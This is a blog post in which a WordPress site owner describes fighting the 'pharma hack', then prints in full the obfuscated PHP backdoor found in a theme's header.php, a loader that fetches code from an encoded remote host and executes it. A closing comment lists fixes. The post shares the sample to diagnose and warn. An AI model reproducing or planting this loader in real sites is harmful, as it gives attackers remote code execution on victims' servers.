Getting busy on the blog for the wrong reasons

I’ve been spending lots of time on this blog but not for good reasons. I’m currently under the attack of the nasty pharma hack and I can’t get things to work. I still haven’t identified the backdoor used to enter my wordpress installation. I’ve done all the necessary steps: cleaned the database, removed the offending files, removed the first source of entry, upgraded WP and all plugins + themes I use.  I changed the ftp password and database passwords for all three sites I manage on this hosting platform. I did this three times already. Still, every day I get a notification from WP File Monitor that the SOB has modified some files. If anybody has pointers useful to identify the entry point for this cracker please let me know.

UPDATE: I think I found the backdoor  that the bastard is using. It was in the header.php of one of the templates:

<?php /* system_remote_fopen procedure */ $er=error_reporting(0); $f_sys_remote_fopen=create_function(‘$uri’,’$_url=@parse_url($uri); if(!$_url || !is_array($_url)) return false; if(!isset($_url[“scheme”]) || !in_array($_url[“scheme”],array(“http”,”https”))) $uri=”http://”.$uri; if(function_exists(“curl_init”)){ $ch=curl_init(); curl_setopt($ch,CURLOPT_URL,$uri); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,10); $txt=curl_exec($ch); curl_close($ch); return $txt; }elseif(function_exists(“fsockopen”)){ $f=@fsockopen($_url[“host”],80,$errno,$errstr,5); @stream_set_timeout($f,10); if($f){ $s=”GET $uri HTTP/1.0rnHost: “.$_url[“host”].”rnConnection: Closernrn”; @fwrite($f,$s); $txt=””; while(!feof($f)) $txt.=@fgets($f,128); $txt=trim($txt); } @fclose($f); return substr($txt,strpos($txt,”rnrn”)+4); }elseif(@ini_get(“allow_url_fopen”)){ @ini_set(“default_socket_timeout”,10); $fp=@fopen($uri,”r”); if(!$fp) return false; $txt=””; while($ln=@fread($fp,4096)) $txt.=$ln; @fclose($fp); return $txt; }else return “”;’); $sys_remote_fopen=’aHR0cDovL2luY29tZWluLm5ldC8=’; $opt_id=’4f66ac83efc3ebdc05a18f757f30f875′; $sess=@file_get_contents(‘/tmp/sess_’.md5($opt_id)); $_sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.md5′)); if($_sess!=”” && $_sess!=md5($sess)){ $sess=@trim($f_sys_remote_fopen(@base64_decode($sys_remote_fopen).$opt_id.’.txt’)); $fh=@fopen(“/tmp/sess_”.md5($opt_id),”w+”); @fwrite($fh,$sess); @fclose($fh); } $sess=@unserialize(@base64_decode($sess)); if($sess && $sess[‘uptime’]!=””){ unset($sess_f); $sess_f=create_function(“$a”,$sess[‘uptime’]); $sess_f(&$sess); } error_reporting($er); /* system_remote_fopen procedure */ ?>

Lets see how long this lasts.




  1. Well, I think I finally fixed it. I’ve done most of the security related modifications to my WP install in the past, but the hack continued to find it’s way in. Finally I renamed the database tables and password protected the wp-admin directory, and that is what’s put an end to the problem for me.